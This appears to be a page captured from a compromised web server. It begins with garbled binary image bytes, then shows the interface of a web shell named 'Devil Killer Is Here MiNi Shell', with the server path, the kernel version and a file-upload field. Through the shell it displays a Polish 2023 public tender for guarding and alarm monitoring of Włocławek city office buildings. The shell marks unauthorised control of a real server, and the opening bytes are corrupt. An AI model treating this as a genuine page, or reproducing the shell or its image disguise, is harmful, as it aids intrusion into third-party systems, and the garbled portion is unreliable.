JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230928/0041856301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona fizyczna obiektów (dozór) i mienia Urzędu Miasta Włocławek, monitoring lokalnego systemu alarmowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO WŁOCŁAWEK - Urząd Miasta Włocławek</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866910</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zielony Rynek 11/13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włocławek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 (54) 414 40 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 (54) 414 42 57</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.wloclawek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wloclawek.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona fizyczna obiektów (dozór) i mienia Urzędu Miasta Włocławek, monitoring lokalnego systemu alarmowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e331c0df-5de0-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00418563</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00060399/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.15 Ochrona fizyczna obiektów (dozór) i mienia Urzędu Miasta Włocławek, monitoring lokalnego systemu alarmowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 1) ustawy</p> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umwloclawek.logintrade.net/zapytania_email,141327,8be00655e698d66639db574074c169a2.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy Przetargowej Urzędu Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html oraz<br/>za pomocą poczty elektronicznej, z zastrzeżeniem pkt. 3.<br/>3. Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego prawidłowe złożenie na Platformie Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html, w<br/>wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem.<br/>4. Korespondencję związaną z prowadzonym postępowaniem można również kierować na następujący adres poczty elektronicznej Zamawiającego: zamowienia@um.wloclawek.pl, z zastrzeżeniem pkt. 3.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzystanie z Platformy Przetargowej Urzędu Miasta Włocławek przez Wykonawcę jest bezpłatne.<br/>2. Instrukcja korzystania z Platformy Przetargowej Urzędu Miasta Włocławek dostępna jest pod adresem:<br/>https://umwloclawek.logintrade.net/rejestracja/instrukcje.html.<br/>3. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Urzędu Miasta Włocławek ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>4. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy użyciu Platformy Przetargowej Urzędu Miasta Włocławek:<br/>1) dopuszczalne przeglądarki internetowe:<br/>a) Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>b) Google Chrome 31,<br/>c) Mozilla Firefox 26,<br/>d) Opera 18;<br/>2) pozostałe wymagania techniczne:<br/>a) dostęp do sieci Internet,<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax,<br/>c) włączona obsługa JavaScript,<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s,<br/>e) zainstalowany Acrobat Reader,<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy;<br/>3) wspierane są rozwiązania dostarczane przez firmy:<br/>a) Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.,<br/>b) Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.,<br/>c) Powszechne Centrum Certyfikacji Certum firmy Unizeto Technologies S.A.,<br/>d) Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.;<br/>4) dopuszczalne formaty przesyłanych danych: Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie § 2 ust. 1 i 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452 ze zm.). Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: *.pdf.<br/>5) maksymalny rozmiar pojedynczego pliku: 150 MB, przy czym nie określa się limitu liczby plików.<br/>5. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej. Adres poczty elektronicznej Zamawiającego to: zamowienia@um.wloclawek.pl.<br/>6. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>7. Zamawiający zaleca, aby nazwa plików lub katalogów przesyłanych Zamawiającemu przy użyciu Platformy Przetargowej Urzędu Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html, oraz za pomocą poczty elektronicznej zawierała maksymalnie 50 znaków.<br/>8. W przypadku niezastosowania się przez Wykonawcę do zalecenia Zamawiającego, o którym mowa w pkt. 7, Wykonawca przyjmuje na siebie wyłączne ryzyko braku możliwości otwarcia przez Zamawiającego przesłanego pliku lub katalogu, a tym samym ryzyko braku możliwości zapoznania się przez Zamawiającego treścią przesłanego pliku lub katalogu.<br/>9. Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej podpisem kwalifikowanym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.37.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest ochrona fizyczna obiektów (dozór) i mienia Urzędu Miasta Włocławek oraz monitoring lokalnego systemu alarmowego zainstalowanego w Archiwum zakładowym mieszczącym się przy ul. Ptasiej 2a. W zakres zadania wchodzi:<br/>I. Ochrona fizyczna obiektów (dozór) i mienia Urzędu Miasta Włocławek, polegająca na świadczeniu usługi w zakresie ochrony fizycznej obiektów (dozór) i mienia Urzędu Miasta Włocławek poprzez bezpośrednią ochronę fizyczną, sprawowaną zgodnie z obowiązującymi przepisami prawa, czterech obiektów/posterunków Urzędu Miasta Włocławek zlokalizowanych we Włocławku przy:<br/>- Zielonym Rynku 11/13 – posterunek dwuosobowy.<br/>- ul. Kościuszki 12 – posterunek jednoosobowy,<br/>- ul. 3 Maja 22 – posterunek jednoosobowy.<br/>UWAGA:<br/>Zamawiający zastrzega sobie prawo zmiany lokalizacji posterunków, a także liczebności osób na danym posterunku, z zastrzeżeniem zachowania stałej ilości osób łącznie na wszystkich posterunkach (cztery osoby) oraz bez zmiany wynagrodzenia przysługującego Wykonawcy.<br/>Zamawiający zobowiązany jest w terminie nie krótszym 14 dni kalendarzowych przed dniem planowanej zmiany do złożenia Wykonawcy oświadczenia o planowanej zmianie.<br/>Usługa wykonywana będzie w dniach i w godzinach wskazanych poniżej:<br/>- poniedziałki, środy, czwartki – w godz. 15:30-7:30;<br/>- wtorki – w godz. 17:00-7:30;<br/>- piątki – w godz. 14:00-7:30;<br/>- soboty, niedziele oraz inne dni wolne od pracy (święta) całodobowo, w godz. 7:30-7:30.<br/>Pracownicy Wykonawcy zobowiązani są stawić się w obiektach Zamawiającego min. 15 minut przed rozpoczęciem świadczenia usługi.<br/>Dopuszcza się zmiany czasu rozpoczęcia i zakończenia ochrony w przypadku zmiany w organizacji pracy urzędu.<br/>Do obowiązków pracowników ochrony należeć będzie między innymi:<br/>- podejmowanie działań interwencyjnych w przypadku stwierdzenia zakłóceń porządku na terenie chronionych obiektów,<br/>- dokonywanie obchodów obiektów/posterunków, co najmniej raz na 2 godziny zwracając szczególną uwagę na zabezpieczenie przed pożarem i zalaniem pomieszczeń,<br/>- ochrona obiektów oraz mienia Zamawiającego w szczególności przed: rabunkiem, włamaniem, zalaniem, pożarem, napadem, kradzieżą, dewastacją, uszkodzeniem oraz przeciwdziałanie powstawaniu szkody wynikającej z tych zdarzeń,<br/>- w sytuacjach szczególnego zagrożenia – ścisła współpraca ze służbami publicznymi: Policją, Strażą Pożarną, Strażą Miejską itp.,<br/>- niezwłoczne powiadomienie Policji oraz pracowników Referatu Obsługi Urzędu o wszelkich zdarzeniach mogących mieć wpływ na zagrożenie bezpieczeństwa osób i mienia na terenie obiektu, w tym:<br/>- o zagrożeniu podłożenia ładunku wybuchowego,<br/>- o zagrożeniu terrorystycznym,<br/>- o zagrożeniu chemicznym, biologicznym,<br/>- o zaistniałych czynach przestępczych, aktach przemocy, aktach wandalizmu,<br/>- w razie pożaru w obiekcie, natychmiastowe powiadomienie Straży Pożarnej, Policji i pracowników Referatu Obsługi Urzędu oraz wzmożenie czujności w celu uniemożliwienia zaboru mienia przez osoby postronne działające pod pozorem niesienia pomocy,<br/>- pomoc w sprawie ewakuacji osób przebywających w budynku w przypadku wystąpienia zagrożenia zdrowia lub życia osób przebywających na terenie obiektu,<br/>- udostępnianie pomieszczeń urzędu po godzinach pracy urzędu oraz w dni wolne od pracy na podstawie zezwolenia pisemnego oraz prowadzenie stosownej ich ewidencji (z podaniem imienia i nazwiska osoby, godziny wejścia i wyjścia, kluczy, jakie zostały tej osobie udostępnione oraz wszelkich spostrzeżeń i uwag),<br/>- przyjmowanie i wydawanie kluczy pracownikom Urzędu oraz personelowi sprzątającemu, w tym wpisywanie godzi zdania kluczy przez pracowników Urzędu i pracowników personelu sprzątającego odpowiednio w Ewidencji kluczy pobranych i zdanych lub Ewidencji kluczy dla personelu sprzątającego,<br/>- przekazywanie obiektów po zakończeniu każdej zmiany osobie kierującej ochroną obiektów Zamawiające-go,<br/>- znajomość rozmieszczenia i umiejętność obsługi głównych wyłączników prądu, instalacji ppoż. oraz zaworów wodnych,<br/>- wykonywanie innych zadań związanych z bezpieczeństwem obiektów, zleconych przez Zamawiającego,<br/>- załączanie i rozbrajanie lokalnego systemu alarmowego,<br/>- prowadzenie „książki raportów ze służby”, której zapisy będą obejmować:<br/>- obsadę personalną pracowników ochrony na zmianie,<br/>- czas ich pracy,<br/>- zwięzły opis zaistniałych wydarzeń w toku służby,<br/>- fakt przeprowadzenia kontroli przez upoważnione osoby ze strony Wykonawcy lub ze strony Zamawiającego.<br/>Zapis kontroli ma odzwierciedlać zagadnienia poddane sprawdzeniu, a w przypadku stwierdzenia nieprawidłowości wnioski, jakie działania podjęto celem ich usunięcia.<br/>- ochrona obiektów, pomieszczeń i urządzeń Zamawiającego przed dostępem do nich osób nieuprawnionych,<br/>- stosowanie wewnętrznych procedur funkcjonujących u Zamawiającego,<br/>- sprawdzanie pomieszczeń po wyjściu personelu sprzątającego, w tym w szczególności: zamknięcie okien, zgaszenie świateł, zamknięcie drzwi, dokręcenie kranów,<br/>- bezzwłoczne powiadamianie organów ścigania, innych służb oraz Zamawiającego o czynach przestępczych zaistniałych na terenie należącym do Zamawiającego oraz zabezpieczenie miejsca ich popełnienia do czasu przybycia odpowiednich organów i służb,<br/>- otwieranie i zamykanie drzwi wejściowych, w ustalonych godzinach, do ochranianych obiektów,<br/>- składanie pracownikom Referatu Obsługi Urzędu ustnych, bieżących raportów dotyczących zdarzeń i incydentów zaistniałych podczas pełnienia służby.<br/>Wykonawca zobowiązany jest do posiadania co najmniej 1 grupy interwencyjnej – GI, działającej na terenie administracyjnym miasta Włocławek, (zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21 października 2011 r. w sprawie zasad uzbrojenia specjalistycznych uzbrojonych formacji ochronnych i warunków przechowywania oraz ewidencjonowania broni i amunicji) do wsparcia pracowników ochrony na poszczególnych obiektach/posterunkach. Czas dojazdu od chwili wezwania do danego ochranianego obiektu Zamawiającego nie może przekroczyć czasu reakcji grupy interwencyjnej zadeklarowanego w formularzu ofertowym, z zastrzeżeniem, że maksymalny czas reakcji wynosi 15 minut od powiadomienia / zaalarmowania Wykonawcy do przyjazdu grupy interwencyjnej na miejsce interwencji. Grupa interwencyjna, to co najmniej dwóch pracowników ochrony, którzy po uzyskaniu informacji o zagrożeniu chronionych osób lub mienia Zamawiającego, udają się na teren obiektu Zamawiającego w celu realizacji zadań ochrony osób lub mienia w formie bezpośredniej ochrony fizycznej. Wykonawca zobowiązany jest do zapewnienia łączności pomiędzy pracownikami ochrony a mobilnymi grupami interwencyjnymi. Zamawiający zastrzega sobie prawo kontroli działalności grupy interwencyjnej poprzez wezwanie grupy raz na kwartał bez ponoszenia skutków finansowych.<br/>III. Prace konserwacyjne i przeglądy okresowe<br/>W przypadku prowadzenia czynności konserwacyjnych i okresowych przeglądów technicznych instalacji sygnalizacji pożaru lub instalacji alarmowych, Zamawiający zawiadamia dyżurnego stacji monitorowania Wykonawcy o prowadzeniu powyższych prac (należy wskazać datę i prognozowane godziny rozpoczęcia i zakończenia prac serwisowych) oraz o możliwości wystąpienia w czasie prac serwisowych, wywołanych „fałszywie” sygnałów/alarmów o wystąpieniu pożaru, które nie wymagają powiadomienia Straży Pożarnej, Policji, wyznaczonych przez Zamawiającego osób oraz kierowania na miejsce grupy interwencyjnej.<br/>Zgłoszenia o rozpoczęciu i zakończeniu czynności konserwacyjnych i okresowych przeglądów technicznych może dokonać tylko pracownik Zamawiającego, autoryzując się hasłem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji grupy interwencyjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie własnej grupy interwencyjnej (GI)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki udziału dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający odstąpił od określenia warunków udziału w postępowaniu w tym zakresie<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a)	posiada aktualną koncesję na wykonywanie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej oraz zabezpieczenia technicznego, udzieloną przez ministra właściwego do spraw wewnętrznych, zgodnie z art. 15 ust. 1 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U. z 2021 r., poz. 1995, z późn. zm.).<br/>b)	posiada aktualne pozwolenie radiowe Prezesa Urzędu Komunikacji Elektronicznej na używanie urządzeń radiowych (pozwalające na odbieranie sygnałów z lokalnego systemu alarmowego droga radiową), obejmujące swym zasięgiem miasto Włocławek. <br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>- posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 500 000,00 złotych.<br/>4)	zdolności technicznej lub zawodowej: <br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a)	wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej trzy usługi polegające na ochronie budynków użyteczności publicznej, o wartości co najmniej 150 000,00 złotych brutto – każda usługa.<br/>Pod pojęciem budynku użyteczności publicznej rozumie się budynki, o których mowa w § 3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich 